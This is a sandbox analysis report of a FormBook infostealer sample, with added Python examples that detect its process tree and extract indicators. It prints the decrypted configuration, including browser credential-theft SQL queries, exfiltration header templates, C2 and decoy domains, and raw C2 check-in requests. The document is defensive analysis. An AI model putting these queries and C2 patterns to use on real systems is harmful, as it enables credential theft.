Analysis Report RRW9901200241.exe

Overview

General Information

Sample Name: RRW9901200241.exe
Analysis ID: 339369
MD5: 61ffb4ad4721f51413075923b2e9468d
SHA1: aa9ca98955157ca28bdbb1d8d29c3d1af2e28023
SHA256: 546e873e9e746eeee9cbed391ff7463ce192091ee0ff51c076291da5d836f64f
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • RRW9901200241.exe (PID: 3016 cmdline: 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: 61FFB4AD4721F51413075923B2E9468D)
    • RRW9901200241.exe (PID: 6148 cmdline: 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: 61FFB4AD4721F51413075923B2E9468D)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6476 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 6556 cmdline: /c del 'C:\Users\user\Desktop\RRW9901200241.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
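The tree above is the part a detection engineer keys on: the sample starts a second copy of itself (PID 6148, the hollowed child), the injected code then runs inside the already-running explorer.exe and drives a SysWOW64 cmd.exe, and the last cmd.exe removes the original file with `/c del` (the same `/c del "` string sits in the decrypted configuration further down). The Python below is an added example, not part of the Joe Sandbox report, that rebuilds this tree from process-creation events and flags the self-spawn, the self-deletion and the explorer.exe to WOW64 cmd.exe hop. The event records are constructed from the tree; the explorer.exe image path is an assumption (the report gives only its PID and MD5) and the record field names are this example's own.

```python
import re
from typing import Dict, List, Tuple

# Process-creation events rebuilt from the report's Startup tree (constructed sample
# input). The explorer.exe image path is assumed; the report gives only PID and MD5.
EVENTS = [
    {"pid": 3016, "ppid": None, "image": r"C:\Users\user\Desktop\RRW9901200241.exe",
     "cmdline": r"C:\Users\user\Desktop\RRW9901200241.exe"},
    {"pid": 6148, "ppid": 3016, "image": r"C:\Users\user\Desktop\RRW9901200241.exe",
     "cmdline": r"C:\Users\user\Desktop\RRW9901200241.exe"},
    # The sandbox nests the existing shell under the hollowed child because the
    # child injected into it; explorer.exe was not started by the sample.
    {"pid": 3440, "ppid": 6148, "image": r"C:\Windows\explorer.exe", "cmdline": ""},
    {"pid": 6476, "ppid": 3440, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"C:\Windows\SysWOW64\cmd.exe"},
    {"pid": 6556, "ppid": 6476, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\RRW9901200241.exe'"},
    {"pid": 6536, "ppid": 6556, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

# "/c del <path>" with the path optionally wrapped in double or single quotes
DEL_RE = re.compile(r"""/c\s+del\s+["']?(.+?)["']?\s*$""", re.IGNORECASE)


def build_tree(events: List[Dict]) -> Dict[int, Dict]:
    return {e["pid"]: e for e in events}


def ancestors(tree: Dict[int, Dict], pid: int):
    """Yield parent, grandparent, ... of pid until the root of the tree."""
    ppid = tree[pid]["ppid"]
    while ppid is not None and ppid in tree:
        yield tree[ppid]
        ppid = tree[ppid]["ppid"]


def find_self_spawn(tree: Dict[int, Dict]) -> List[int]:
    """A non-system process whose parent runs the same image: the shape of a
    sample re-launching itself as the target of process hollowing."""
    hits = []
    for pid, e in tree.items():
        if "\\windows\\" in e["image"].lower():   # cmd.exe -> cmd.exe is normal
            continue
        parent = tree.get(e["ppid"])
        if parent and parent["image"].lower() == e["image"].lower():
            hits.append(pid)
    return hits


def find_self_delete(tree: Dict[int, Dict]) -> List[Tuple[int, int]]:
    """cmd.exe /c del <path> where <path> is the image of an ancestor process:
    returns (cmd.exe pid, nearest ancestor whose image is deleted)."""
    hits = []
    for pid, e in tree.items():
        if not e["image"].lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(e["cmdline"])
        if not m:
            continue
        target = m.group(1).lower()
        for anc in ancestors(tree, pid):
            if anc["image"].lower() == target:
                hits.append((pid, anc["pid"]))
                break
    return hits


def find_shell_to_wow64_cmd(tree: Dict[int, Dict]) -> List[int]:
    """Heuristic of this example (not a report signature): a 32-bit
    SysWOW64\\cmd.exe directly beneath explorer.exe on a 64-bit host."""
    return [pid for pid, e in tree.items()
            if "\\syswow64\\cmd.exe" in e["image"].lower()
            and tree.get(e["ppid"], {}).get("image", "").lower().endswith("\\explorer.exe")]


if __name__ == "__main__":
    t = build_tree(EVENTS)
    print("self-spawn:", find_self_spawn(t))
    print("self-delete (cmd pid, victim pid):", find_self_delete(t))
    print("explorer.exe -> WOW64 cmd.exe:", find_shell_to_wow64_cmd(t))
```

On the report's tree the self-delete check resolves the deleted path to PID 6148 rather than 3016 because it stops at the nearest ancestor; both copies share the image, and the first process is the one that already exited after hollowing its child.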

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d5b1", "CONFIG SIZE : 0xa9", "CONFIG OFFSET 0x1d6ae", "URL SIZE : 20", "searching string pattern", "strings_offset 0x1c193", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x891aaffb", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715020", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121f4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01449", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", 
"0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", 
"encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "grayfoxden.com", "drupadhyayashomoeopathy.com", "coordinatedcare-ok.com", "the-legend-update3.com", "remoteworkoffer.com", "r3dprojects.com", "banhuaihangschool.com", "7852bigbucktrail.info", "villagepizzafloralpark.com", "sgtradingusa.com", "evolvestephanieperreault.com", "timelessbeautylessons.com", "monkeytrivia.com", "bsf.xyz", "canda.design", "recetasnutribullet.com", "olenfex.com", "catatan-matematika.com", "roeltecnologiadigital.com", "jutoxnatural.com", "euroticie.info", "tmxinc-chemicals.com", "futurehawick.com", "xaxzwz.com", "kitfal.com", "mickey2nd.com", "world10plus.com", "harkinstheates.com", "conceptpowder.com", "aeshahcosmetics.com", "netglog.net", "mystery-enigma.net", "packerssandmover.online", "weinsurehumans.com", "estrade-monschau.com", "poinintiteknologi.com", "zipdelta.com", "thibau4.xyz", "immobiliervaldoingt.com", "superherospirit.com", "c-vital33.com", "dydongyuan.com", "glamatomy.com", "campingpt.com", "wozhebank.com", "citestaccnt1597754710.com", 
"localcryptod.com", "celinemnique.com", "broderies-admc.com", "watdomenrendi03.net", "dehaochu.com", "missbeehavn.com", "ryangyoung.com", "kcspantry.com", "posdonanim.com", "directtestingservice.com", "toastxpress.com", "kingdommarketinguniversity.com", "quantumtoday.xyz", "modernhomespa.com", "peakeventsservices.com", "dellvn.net", "maryjoyllc.com", "trentog.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.unitvn.com/krc/\u0000"]}
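Turning the extracted configuration above into indicators, as an added example (this is not Joe Sandbox's code nor the FormBook configuration extractor's). The string list carries three things a responder wants: the real C2 (the entry after the "Decrypted CnC URL" divider, with a trailing NUL the extractor kept), the 64 domains between f-start and f-end (decoy hosts the sample contacts alongside the real server; the Networking section shows requests to two of them and to unitvn.com), and the credential-theft targets (the moz_logins and Chrome logins queries, the Login Data and logins.json paths). The embedded list is a constructed subset of the page's strings with 8 of the 64 decoys and no function hashes; the IOC field names are this example's own.

```python
import re
from typing import Dict, List

# Subset of the "Decrypted Strings" list from the Malware Configuration section
# (constructed excerpt: function hashes omitted, 8 of the 64 decoy domains kept).
CONFIG_STRINGS = [
    "USERNAME", "LOCALAPPDATA", "APPDATA", "/c copy \"", "/c del \"", "\\Run",
    "\\Google\\Chrome\\User Data\\Default\\Login Data", "\\logins.json",
    "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins",
    "SELECT origin_url, username_value, password_value FROM logins",
    "SeDebugPrivilege", "SeShutdownPrivilege", "config.php",
    "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "",
    "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "",
    "Content-Type: application/x-www-form-urlencoded", "", "dat=",
    "f-start",
    "grayfoxden.com", "7852bigbucktrail.info", "bsf.xyz", "canda.design",
    "toastxpress.com", "dellvn.net", "maryjoyllc.com", "trentog.com",
    "f-end",
    "-" * 50, "Decrypted CnC URL", "-" * 50, "www.unitvn.com/krc/\u0000",
]

HEADER_RE = re.compile(r"^[A-Za-z][A-Za-z-]*: ")   # "Host: ", "User-Agent: ..." templates


def extract_iocs(strings: List[str]) -> Dict:
    iocs = {"c2_host": None, "c2_path": None, "decoys": [], "post_headers": [],
            "sql": [], "cred_paths": [], "privileges": []}
    in_decoys = False
    for i, s in enumerate(strings):
        if s == "f-start":
            in_decoys = True
            continue
        if s == "f-end":
            in_decoys = False
            continue
        if in_decoys:
            iocs["decoys"].append(s.lower())
        elif s == "Decrypted CnC URL":
            # the URL follows a divider line; drop the trailing NUL the extractor kept
            url = next(x for x in strings[i + 1:] if x and set(x) != {"-"}).rstrip("\x00")
            host, _, path = url.partition("/")
            iocs["c2_host"], iocs["c2_path"] = host.lower(), "/" + path
        elif HEADER_RE.match(s):
            iocs["post_headers"].append(s.strip())
        elif s.startswith("SELECT "):
            iocs["sql"].append(s)
        elif s.endswith(("Login Data", "logins.json", "signons.sqlite")):
            iocs["cred_paths"].append(s)
        elif s.startswith("Se") and s.endswith("Privilege"):
            iocs["privileges"].append(s)
    return iocs


def _bare(host: str) -> str:
    """Strip a leading 'www.': the observed Host headers carry it, the config list does not."""
    h = host.lower()
    return h[4:] if h.startswith("www.") else h


def classify_host(host: str, iocs: Dict) -> str:
    """'c2' for the real server, 'decoy' for a cover domain, otherwise 'unknown'."""
    h = _bare(host)
    if h == _bare(iocs["c2_host"]):
        return "c2"
    if h in {_bare(d) for d in iocs["decoys"]}:
        return "decoy"
    return "unknown"


if __name__ == "__main__":
    found = extract_iocs(CONFIG_STRINGS)
    print("C2:", found["c2_host"], found["c2_path"])
    print("decoys:", len(found["decoys"]), "credential queries:", len(found["sql"]))
    for h in ("www.unitvn.com", "www.toastxpress.com", "example.com"):
        print(h, "->", classify_host(h, found))
```

The header templates are worth keeping as well: they belong to the POST exfiltration path and carry a fixed `User-Agent: Mozilla Firefox/4.0`, whereas the GET check-ins in the Networking section send no User-Agent at all, so the two legs of the protocol need different detections.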

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 entries in total; the remaining ones are collapsed in the report)

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 0.2.RRW9901200241.exe.1a00000.2.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0.2.RRW9901200241.exe.1a00000.2.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0.2.RRW9901200241.exe.1a00000.2.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x175f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1770c:$sqlite3step: 68 34 1C 7B E1
  • 0x17628:$sqlite3text: 68 38 2A 90 C5
  • 0x1774d:$sqlite3text: 68 38 2A 90 C5
  • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(7 entries in total; the remaining ones are collapsed in the report)

Sigma Overview

No Sigma rule has matched

Signature Overview


          AV Detection:

Antivirus / Scanner detection for submitted sample
Source: RRW9901200241.exe | Avira: detected
Antivirus detection for URL or domain
Source: http://www.unitvn.com/krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 | Avira URL Cloud: Label: malware
Found malware configuration
Source: 0.2.RRW9901200241.exe.1a00000.2.unpack | Malware Configuration Extractor: FormBook (the extracted configuration is reproduced in full in the Malware Configuration section above; the copy the report repeats here is truncated)
Multi AV Scanner detection for submitted file
Source: RRW9901200241.exe | ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: RRW9901200241.exe | Joe Sandbox ML: detected
Source: 0.2.RRW9901200241.exe.1a00000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.RRW9901200241.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: RRW9901200241.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: RRW9901200241.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: RRW9901200241.exe, 00000000.00000003.337251978.000000001B070000.00000004.00000001.sdmp, RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp
Source: Binary string: cmd.pdbUGP source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: RRW9901200241.exe, cmd.exe
Source: Binary string: cmd.pdb source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,4_2_002B245C
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,4_2_002B68BA
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,4_2_002AB89C
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_002A85EA
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,4_2_002C31DC
Source: C:\Users\user\Desktop\RRW9901200241.exe | Code function: 4x nop then pop edi (2_2_00417D6E)

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 161.35.25.247:80
Source: global traffic | HTTP traffic detected:
  GET /krc/?Bv=CDu2q1wwlPol/aaE7LTgnX8K53P3sg99O/jiiFC4V2fCANwRdAJcp+ZFqaBz9HB2y9P2V6qKww==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1
  Host: www.7852bigbucktrail.info
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected:
  GET /krc/?Bv=idO/LAWRhq8eaiStiRRR14QihBlHCWd10ZsS07gNigVsPM/nj7NW3DcAwcUnOO2Dm4jIcS3FWg==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1
  Host: www.toastxpress.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven NUL bytes, nothing printable)
Source: global traffic | HTTP traffic detected:
  GET /krc/?Bv=yIa+94l9rzehTYM3PiVfcRiVsqTAPcUdvzwZbg1xcjwMDM0Vsi/KUjipuHGUDzRPALJr1HG4xA==&J494p=ARALpBVpxtEXKvT0 HTTP/1.1
